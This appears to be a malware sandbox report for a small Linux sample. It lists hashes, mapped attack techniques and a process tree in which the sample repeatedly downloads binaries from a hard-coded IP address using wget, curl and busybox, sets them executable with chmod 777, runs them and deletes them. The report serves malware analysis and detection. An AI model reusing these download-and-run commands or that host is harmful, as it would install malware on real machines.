Analysis
-
max time kernel
36s -
max time network
110s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24/11/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsel-20240611-en
General
-
Target
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
-
Size
10KB
-
MD5
a7136f5f7aad005f449adf4d9eb6e330
-
SHA1
b6cddbe652904c25cc2e6c5f3063fb13a4df6737
-
SHA256
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
-
SHA512
246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
-
SSDEEP
192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1515 chmod 1563 chmod 1605 chmod 1502 chmod 1521 chmod 1551 chmod 1587 chmod 1611 chmod 1623 chmod 1629 chmod 1637 chmod 1533 chmod 1569 chmod 1581 chmod 1617 chmod 1649 chmod 1667 chmod 1545 chmod 1557 chmod 1599 chmod 1643 chmod 1661 chmod 1539 chmod 1575 chmod 1509 chmod 1527 chmod 1593 chmod 1655 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ 1503 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq 1510 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL 1516 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 1522 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA 1528 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl 1534 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs 1540 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS 1546 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t 1552 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA 1558 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS 1564 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv 1570 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 1576 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF 1582 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS 1588 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t 1594 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv 1600 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA 1606 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS 1612 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 1618 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF 1624 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl 1630 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs 1638 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ 1644 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq 1650 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL 1656 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 1662 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA 1668 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 curl File opened for modification /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF curl File opened for modification /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS curl File opened for modification /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 curl File opened for modification /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t curl File opened for modification /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq curl File opened for modification /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA curl File opened for modification /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq curl File opened for modification /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA curl File opened for modification /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv curl File opened for modification /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA curl File opened for modification /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl curl File opened for modification /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 curl File opened for modification /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA curl File opened for modification /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs curl File opened for modification /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS curl File opened for modification /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS curl File opened for modification /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 curl File opened for modification /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL curl File opened for modification /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl curl File opened for modification /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv curl File opened for modification /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ curl File opened for modification /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t curl File opened for modification /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS curl File opened for modification /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL curl File opened for modification /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF curl File opened for modification /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs curl File opened for modification /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ curl
Processes
-
/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N1⤵PID:1481
-
/bin/rm/bin/rm bins.sh2⤵PID:1482
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1483
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Writes file to tmp directory
PID:1491
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1501
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:1502
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:1503
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1504
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1505
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1507
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:1509
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:1510
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1511
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1512
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Writes file to tmp directory
PID:1513
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1514
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:1516
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1518
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1520
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1523
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1524
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1526
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1529
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1530
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1532
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1535
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1538
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1541
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1544
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1547
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1550
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1553
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1556
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1559
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1562
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1565
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1568
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1571
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1572
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1574
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1577
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1580
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1583
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1586
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1589
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1592
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1595
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1598
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1601
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1604
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1607
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1610
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1613
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1614
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1616
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1619
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1622
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:1624
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1625
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1626
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1628
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1631
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1636
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:1637
-
-
